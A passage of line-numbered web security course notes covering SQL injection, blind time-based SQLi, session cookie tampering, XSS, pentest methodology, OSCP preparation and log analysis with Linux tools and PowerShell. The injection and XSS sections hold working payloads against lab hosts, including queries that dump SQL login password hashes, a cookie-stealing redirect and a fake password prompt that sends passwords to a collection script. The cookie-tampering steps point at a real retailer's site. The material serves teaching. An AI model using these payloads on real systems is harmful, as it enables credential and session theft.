1237 Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
1238
1239---------------------------Type This-----------------------------------
1240
1241http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
1242http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
1243http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
1244http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
1245
1246-----------------------------------------------------------------------
1247
1248
1249
1250
1251- Another way is to see if you can get the backend to perform an arithmetic function
1252
1253---------------------------Type This-----------------------------------
1254
1255http://45.77.162.239/bookdetail.aspx?id=(2)
1256http://45.77.162.239/bookdetail.aspx?id=(4-2)
1257http://45.77.162.239/bookdetail.aspx?id=(4-1)
1258
1259
1260
1261http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
1262http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
1263http://45.77.162.239/bookdetail.aspx?id=1*1
1264http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
1265http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
1266http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
1267http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
1268http://45.77.162.239/bookdetail.aspx?id=2 &0#
1269
1270
1271
1272http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
1273http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
1274http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
1275http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
1276
1277-----------------------------------------------------------------------
1278
1279
1280###############################
1281# Blind SQL Injection Testing #
1282###############################
1283Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
1284
12853 - Total Characters
1286---------------------------Type This-----------------------------------
1287
1288http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
1289http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
1290http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
1291-----------------------------------------------------------------------
1292
1293Let's go for a quick check to see if it's DBO
1294
1295---------------------------Type This-----------------------------------
1296
1297http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
1298-----------------------------------------------------------------------
1299
1300Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
1301
1302---------------------------Type This-----------------------------------
1303
1304D - 1st Character
1305http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
1306http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
1307http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
1308http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
1309
1310B - 2nd Character
1311http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1312http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1313
1314O - 3rd Character
1315http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1316http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
1317http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1318http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1319http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
1320http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
1321http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1322
1323-----------------------------------------------------------------------
1324
1325
1326
1327
1328
1329
1330
1331################################
1332# Playing with session cookies #
1333################################
1334
1335-----------------------------------------------------------------------
1336Step 1: Browse to NewEgg.com
1337-------------------------Paste this into a browser--------------------------------
1338https://secure.newegg.com/
1339----------------------------------------------------------------------------------
1340
1341
1342Step 2: Browse to the shopping cart page NewEgg.com
1343-------------------------Paste this into Firefox-----------------------------------
1344https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1345----------------------------------------------------------------------------------
1346
1347
1348Step 3: View the current session ID
1349--------------------------Paste this into a browser---------------------------------
1350javascript:void(document.write(document.cookie))
1351------------------------------------------------------------------------------------
1352
1353Step 4: Go back to the shopping cart page (click the back button)
1354---------------------------------------------------------------------------------
1355https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1356---------------------------------------------------------------------------------
1357
1358
1359Step 5: Now let's modify the session ID
1360--------------------------Paste this into a browser---------------------------------
1361javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
1362------------------------------------------------------------------------------------
1363
1364
1365
1366Step 6: Go back to the shopping cart page (click the back button)
1367---------------------------------------------------------------------------------
1368https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1369---------------------------------------------------------------------------------
1370
1371
1372
1373Step 7: View the current session ID
1374--------------------------Paste this into a browser---------------------------------
1375javascript:void(document.write(document.cookie))
1376------------------------------------------------------------------------------------
1377
1378-----------------------------------------------------------------------
1379
1380###########################################
1381# What is XSS #
1382# http://45.63.104.73/2-Intro_To_XSS.pptx #
1383###########################################
1384
1385OK - what is Cross Site Scripting (XSS)
1386
13871. Use Firefox to browse to the following location:
1388---------------------------Type This-----------------------------------
1389
1390 http://45.63.104.73/xss_practice/
1391-----------------------------------------------------------------------
1392
1393 A really simple search page that is vulnerable should come up.
1394
1395
1396
1397
13982. In the search box type:
1399---------------------------Type This-----------------------------------
1400
1401 <script>alert('So this is XSS')</script>
1402-----------------------------------------------------------------------
1403
1404
1405 This should pop-up an alert window with your message in it proving XSS is in fact possible.
1406 Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1407
1408
14093. In the search box type:
1410---------------------------Type This-----------------------------------
1411
1412 <script>alert(document.cookie)</script>
1413-----------------------------------------------------------------------
1414
1415
1416 This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
1417 Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1418
14194. Now replace that alert script with:
1420---------------------------Type This-----------------------------------
1421
1422 <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
1423-----------------------------------------------------------------------
1424
1425
1426This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
1427
1428
14295. Now view the stolen cookie at:
1430---------------------------Type This-----------------------------------
1431
1432 http://45.63.104.73/xss_practice/cookie_stealer_logs.html
1433-----------------------------------------------------------------------
1434
1435
1436The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
1437
1438
1439
1440
1441
1442
1443############################
1444# A Better Way To Demo XSS #
1445############################
1446
1447
1448Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
1449
1450
1451Use Firefox to browse to the following location:
1452---------------------------Type This-----------------------------------
1453
1454 http://45.63.104.73/xss_practice/
1455-----------------------------------------------------------------------
1456
1457
1458
1459Paste this in the search box
1460----------------------------
1461
1462
1463---------------------------Type This-----------------------------------
1464
1465<script>
1466password=prompt('Your session is expired. Please enter your password to continue',' ');
1467document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
1468</script>
1469-----------------------------------------------------------------------
1470
1471
1472Now view the stolen cookie at:
1473---------------------------Type This-----------------------------------
1474
1475 http://45.63.104.73/xss_practice/passwords.html
1476
1477-----------------------------------------------------------------------
1478
1479###############################################################
1480# Question 1: What is the process that you use when you test? #
1481###############################################################
1482
1483Step 1: Automated Testing
1484
1485Step 1a: Web Application vulnerability scanners
1486-----------------------------------------------
1487- Run two (2) unauthenticated vulnerability scans against the target
1488- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
1489- Run two (2) authenticated vulnerability scans against the target with admin privileges
1490
1491The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
1492
1493A good web application vulnerability scanner comparison website is here:
1494http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
1495
1496
1497Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
1498
1499When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
1500
1501
1502Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
1503
1504
1505Also, be sure to save the scan results and logs. I usually provide this data to the customer.
1506
1507
1508
1509Step 1b: Directory Brute Forcer
1510-------------------------------
1511I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
1512
1513
1514
1515Step 2: Manual Testing
1516
1517Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
1518
1519Step 2a: Spider/Scan the entire site with Burp Suite
1520Save the spider and scan results. I usually provide this data to the customer as well.
1521
1522
1523Step 2b: Browse through the site using the 3 question method
1524Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
1525
1526Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
1527
1528Here is what I mean:
1529http://www.site.com/page.aspx?parametername=parametervalue
1530
1531When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
1532
1533http://www.site.com/page.aspx?parametername=[ payload ]
1534
1535You need to ensure that you send the payload this way, and like this below:
1536
1537http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
1538
1539This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
1540
1541
1542
1543
1544
1545
1546
1547###########################################
1548# Question 2: How much fuzzing is enough? #
1549###########################################
1550There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
1551
1552Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
1553
1554
1555Step 1: Ask yourself the 3 questions per page of the site.
1556
1557Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
1558
1559Step 3: When you load your fuzz strings - use the following decision tree
1560
1561 - Are the fuzz strings causing a default error message (example 404)?
1562 - If this is the case then it is most likely NOT vulnerable
1563
1564 - Are the fuzz strings causing a WAF or LB custom error message?
1565 - If this is the case then you need to find an encoding method to bypass
1566
1567
1568 - Are the fuzz strings causing an error message that discloses the backend type?
1569 - If yes, then identify DB type and find correct syntax to successfully exploit
1570 - Some example strings that I use are:
1571 '
1572 "
1573 () <----- Take the parameter value and put it in parenthesis
1574 (5-1) <----- See if you can perform an arithmetic function
1575
1576
1577 - Are the fuzz strings rendering executable code?
1578 - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
1579 - Some example strings that I use are:
1580 <b>hello</b>
1581 <u>hello</u>
1582 <script>alert(123);</script>
1583 <script>alert(xss);</script>
1584 <script>alert('xss');</script>
1585 <script>alert("xss");</script>
1586
1587
1588
1589#######################
1590# Bug Bounty Programs #
1591#######################
1592https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65
1593
1594
1595############################
1596# Bug Hunter's Methodology #
1597############################
1598https://www.youtube.com/watch?v=C4ZHAdI8o1w
1599https://www.youtube.com/watch?v=-FAjxUOKbdI
1600
1601
1602
1603
1604
1605#########################################
1606# Web Application Security Job Roles #
1607# Application Assessor level 1 #
1608#########################################
1609Required Technical Skills: Comfortable with basic Linux/Windows (Linux+/MCSA)
1610 Comfortable with basic web application fundamentals
1611 Comfortable with security fundamentals (Security+)
1612
1613
1614
1615Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities
1616
1617
1618Tools Used:
1619 HP Web Inspect
1620 IBM AppScan
1621 AppSpider
1622 Acunetix Web App Vulnerabilities
1623 Netsparker
1624 Qualys
1625
1626
1627
1628
1629#########################################
1630# Web Application Security Job Roles #
1631# Application Assessor level 2 #
1632#########################################
1633Required Technical Skills: Comfortable with manual web app pentesting (eWPTv1/GWAPT)
1634 Comfortable with basic web application programming
1635 Comfortable researching IT security issues
1636
1637
1638
1639Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities
1640 Perform manual vulnerability validation
1641 Analyze public exploit and develop threat analysis reports
1642 Assess simple applications for vulnerabilities
1643
1644
1645Tools Used:
1646 Burp Suite
1647 OWASP Zap
1648 Fiddler
1649 Charles Proxy Web App Vulnerabilities
1650
1651
1652
1653#########################################
1654# Security Operations Center Job Roles #
1655# Application Assessor level 3 #
1656#########################################
1657Required Technical Skills: Comfortable with manual web app pentesting (eWPTv2)
1658 Comfortable with manual mobile app app pentesting (eMAPT)
1659 Comfortable with advanced web application programming
1660
1661
1662
1663Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities
1664 Perform manual vulnerability validation
1665 Analyze public exploit and develop threat analysis reports
1666 Assess complex web apps and mobile applications for vulnerabilities
1667
1668
1669Tools Used:
1670 Burp Suite
1671 OWASP Zap
1672 Fiddler
1673 Charles Proxy Web App Vulnerabilities
1674
1675
1676
1677
1678
1679-------------------------------------------------------------------------------------------------------------
1680
1681
1682
1683 ####################################
1684####################### How to prepare for the OSCP exam ################################
1685 ####################################
1686
1687The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
1688
1689
1690Issue 1. Lack of a thorough attack process
1691==========================================
1692 - Host discovery
1693 - Service discovery
1694 - Service version discovery
1695 - Vulnerability research
1696 - Linux (port 111)/Window (port 445) Enumeration
1697 - Webserver vulnerability scan
1698 - Directory brute force every webserver
1699 - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
1700 - Brute force all services
1701
1702
1703
1704
1705Issue 2. Lack of automation of the process
1706==========================================
1707 - Organize your notes and resources so you can automate your attack process:
1708 - https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
1709 - https://github.com/sinfulz/JustTryHarder
1710 - https://herrfeder.github.io/pentesting/2018/09/30/OSCP-Cheat-Sheet.html
1711
1712 - Research attacks scripts on the internet to enhance your methodology
1713
1714 - OSCP scripts
1715 - https://github.com/codingo/Reconnoitre
1716 - https://github.com/mikaelkall/massrecon
1717 - https://github.com/fchyla/pwk_scripts
1718
1719 - Network Pentest Automation Scripts
1720 - https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
1721 - https://github.com/1N3/Sn1per
1722 - https://github.com/leebaird/discover
1723
1724
1725
1726Issue 3. Failing to document all steps being performed and their output
1727=======================================================================
1728
1729
1730
1731
1732Issue 4. Lack of sleep during the exam
1733======================================
1734
1735
1736
1737
1738Issue 5. Failing to reboot target machines prior to attack
1739==========================================================
1740
1741
1742
1743--------------------------------------------------------------------------------------------------------------
1744
1745
1746A good strategy to use to prepare for the OSCP would be:
1747
1748Step 1. Ensure that you are comfortable with Linux
1749--------------------------------------------------
1750- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
1751- Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
1752
1753You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
1754https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
1755https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
1756https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
1757
1758
1759
17602. You should be comfortable with the following tools:
1761------------------------------------------------------
1762
1763Nmap:
1764https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
1765
1766Metasploit:
1767https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
1768
1769Burp Suite:
1770https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
1771
1772Sqlmap:
1773https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
1774
1775Nikto:
1776https://www.youtube.com/watch?v=GH9qn_DBzCk
1777
1778Enum4Linux:
1779https://www.youtube.com/watch?v=hA5raaGOQKQ
1780
1781RPCINFO/SHOWMOUNT:
1782https://www.youtube.com/watch?v=FlRAA-1UXWQ
1783
1784Hydra:
1785https://www.youtube.com/watch?v=rLtj8tEmGso
1786
1787
1788
17893. You need to comfortable with basic exploit development
1790---------------------------------------------------------
1791
1792Basic assembly:
1793https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
1794
1795Basic exploit development (first 5 videos in the playlist):
1796https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
1797
1798
17994. You need to be comfortable with privilege escalation
1800-------------------------------------------------------
1801Linux
1802https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
1803
1804Windows
1805https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
1806http://www.fuzzysecurity.com/tutorials/16.html
1807
1808
1809------------------------------------------------------------------------------------------------------------------------
1810
1811
1812
1813
1814
1815
1816
1817#######################
1818# Log Analysis basics #
1819#######################
1820Download this file and open it with Notepad
1821http://45.63.104.73/WhatHappened.txt
1822
1823
1824There are 4 steps to log analysis:
1825
18261. Reduce the noise
18272. Group LIKE data
18283. Rename fields to make it easier to read
18294. Repeat
1830
1831
1832
1833
1834
1835##############################################
1836# Log Analysis with Linux command-line tools #
1837##############################################
1838The following command line executables are found in the Mac as well as most Linux Distributions.
1839
1840cat – prints the content of a file in the terminal window
1841grep – searches and filters based on patterns
1842awk – can sort each row into fields and display only what is needed
1843sed – performs find and replace functions
1844sort – arranges output in an order
1845uniq – compares adjacent lines and can report, filter or provide a count of duplicates
1846
1847
1848##############
1849# Cisco Logs #
1850##############
1851
1852-----------------------------Type this-----------------------------------------
1853wget http://45.63.104.73/cisco.log
1854-------------------------------------------------------------------------------
1855
1856AWK Basics
1857----------
1858To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
1859
1860-----------------------------Type this-----------------------------------------
1861cd ~/log_analysis
1862cat cisco.log | awk '{print $5}' | tail -n 4
1863-------------------------------------------------------------------------------
1864
1865
1866
1867Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
1868
1869-----------------------------Type this-----------------------------------------
1870cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
1871-------------------------------------------------------------------------------
1872
1873
1874
1875While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
1876
1877-----------------------------Type this-----------------------------------------
1878cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
1879-------------------------------------------------------------------------------
1880
1881
1882
1883
1884Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1885
1886-----------------------------Type this-----------------------------------------
1887cat cisco.log | grep %LINEPROTO-5-UPDOWN:
1888
1889cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
1890
1891cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
1892
1893cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
1894--------------------------------------------------------------------------------
1895
1896
1897
1898
1899
1900
1901
1902If you are interested in running PowerShell on Mac OS X, or Linux you can check out the following link:
1903https://www.howtogeek.com/267858/how-to-install-microsoft-powershell-on-linux-or-os-x/
1904
1905
1906
1907
1908
1909
1910#####################
1911# Powershell Basics #
1912#####################
1913
1914PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
1915
1916PowerShell file extension end in .ps1 .
1917
1918An important note is that you cannot double click on a PowerShell script to execute it.
1919
1920To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell. Make sure that you run it as an administrator
1921
1922------------------------Type This------------------------------
1923cd c:\
1924dir
1925cd
1926ls
1927---------------------------------------------------------------
1928
1929
1930To obtain a list of cmdlets, use the Get-Command cmdlet
1931------------------------Type This------------------------------
1932Get-Command
1933---------------------------------------------------------------
1934
1935
1936You can use the Get-Alias cmdlet to see a full list of aliased commands.
1937------------------------Type This------------------------------
1938Get-Alias
1939---------------------------------------------------------------
1940
1941
1942Don't worry you won't blow up your machine with Powershell
1943------------------------Type This------------------------------
1944Get-Process | stop-process Don't press [ ENTER ] What will this command do?
1945Get-Process | stop-process -whatif
1946---------------------------------------------------------------
1947
1948To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
1949------------------------Type This------------------------------
1950Get-Help Get-Command
1951
1952Get-Help Get-Service –online
1953
1954Get-Service -Name TermService, Spooler
1955
1956Get-Service –N BITS
1957---------------------------------------------------------------
1958
1959
1960
1961
1962
1963- Run cmdlet through a pie and refer to its properties as $_
1964------------------------Type This------------------------------
1965Get-Service | where-object { $_.Status -eq "Running"}
1966---------------------------------------------------------------
1967
1968
1969
1970- PowerShell variables begin with the $ symbol. First lets create a variable
1971------------------------Type This------------------------------
1972$serv = Get-Service –N Spooler
1973---------------------------------------------------------------
1974
1975To see the value of a variable you can just call it in the terminal.
1976------------------------Type This------------------------------
1977$serv
1978
1979$serv.gettype().fullname
1980---------------------------------------------------------------
1981
1982
1983Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
1984------------------------Type This------------------------------
1985$serv | Get-Member
1986
1987Get-Member -InputObject $serv
1988---------------------------------------------------------------
1989
1990
1991
1992
1993Let's use a method and a property with our object.
1994------------------------Type This------------------------------
1995$serv.Status
1996$serv.Stop()
1997$serv.Refresh()
1998$serv.Status
1999$serv.Start()
2000$serv.Refresh()
2001$serv.Status
2002---------------------------------------------------------------
2003
2004
2005If you want some good command-line shortcuts you can check out the following link:
2006https://technet.microsoft.com/en-us/library/ff678293.aspx
2007
2008
2009
2010
2011#############################
2012# Simple Event Log Analysis #
2013#############################
2014Let's setup a directory to work in:
2015------------------------Type This------------------------------
2016cd c:\
2017
2018mkdir ps
2019
2020cd ps
2021---------------------------------------------------------------
2022
2023Step 1: Dump the event logs
2024---------------------------
2025The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
2026
2027To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
2028If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
2029------------------------Type This------------------------------
2030Get-EventLog -LogName application | Export-Clixml Applog.xml
2031
2032type .\Applog.xml
2033
2034$logs = "system","application","security"
2035---------------------------------------------------------------
2036
2037
2038The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
2039------------------------Type This------------------------------
2040$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
2041---------------------------------------------------------------
2042
2043
2044
2045
2046Step 2: Import the event log of interest
2047----------------------------------------
2048To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
2049Store the results in a variable.
2050Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
2051
2052The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
2053------------------------Type This------------------------------
2054$seclog = Import-Clixml security.xml
2055
2056$seclog | select -Last 5
2057---------------------------------------------------------------
2058
2059Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
2060------------------------Type This------------------------------
2061Get-EventLog Application -After (Get-Date).AddDays(-1)
2062---------------------------------------------------------------
2063You can use '-after' and '-before' to filter date ranges
2064
2065One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
2066By default, an ordinary user does not have permission to read the security log.
2067
2068
2069I had another student ask me if we can go back in hours instead of days and the answer is yes.
2070------------------------Type This------------------------------
2071Get-EventLog Application -After (Get-Date).AddHours(-1)
2072---------------------------------------------------------------
2073
2074
2075
2076Step 3: Drill into a specific entry
2077-----------------------------------
2078To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
2079
2080------------------------Type This------------------------------
2081$seclog | select -first 1 | fl *
2082---------------------------------------------------------------
2083
2084The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
2085
2086------------------------Type This------------------------------
2087($seclog | select -first 1).message
2088
2089(($seclog | select -first 1).message).gettype()
2090---------------------------------------------------------------
2091
2092
2093In the *nix world you often want a count of something (wc -l).
2094How often is the SeSecurityPrivilege privilege mentioned in the message property?
2095To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
2096------------------------Type This------------------------------
2097$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
2098---------------------------------------------------------------
2099If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
2100
2101------------------------Type This------------------------------
2102$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
2103---------------------------------------------------------------
2104
2105Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
2106Use the count property to determine the total number of entries in the event log.
2107------------------------Type This------------------------------
2108$seclog.Count
2109---------------------------------------------------------------
2110
2111
2112
2113
2114
2115############################
2116# Simple Log File Analysis #
2117############################
2118
2119
2120You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
2121
2122------------------------Type This------------------------------
2123cd c:\ps
2124(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
2125(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
2126Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
2127---------------------------------------------------------------
2128
2129
2130
2131The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
2132------------------------Type This------------------------------
2133Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
2134---------------------------------------------------------------
2135
2136
2137
2138To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
2139------------------------Type This------------------------------
2140Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
2141---------------------------------------------------------------
2142
2143
2144To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
2145------------------------Type This------------------------------
2146Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
2147---------------------------------------------------------------
2148
2149
2150Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
2151------------------------Type This------------------------------
2152Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
2153---------------------------------------------------------------
2154
2155In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
2156This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
2157------------------------Type This------------------------------
2158Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
2159---------------------------------------------------------------
2160
2161
2162
2163##############################################
2164# Parsing Log files using windows PowerShell #
2165##############################################
2166
2167Download the sample IIS log http://pastebin.com/LBn64cyA
2168
2169------------------------Type This------------------------------
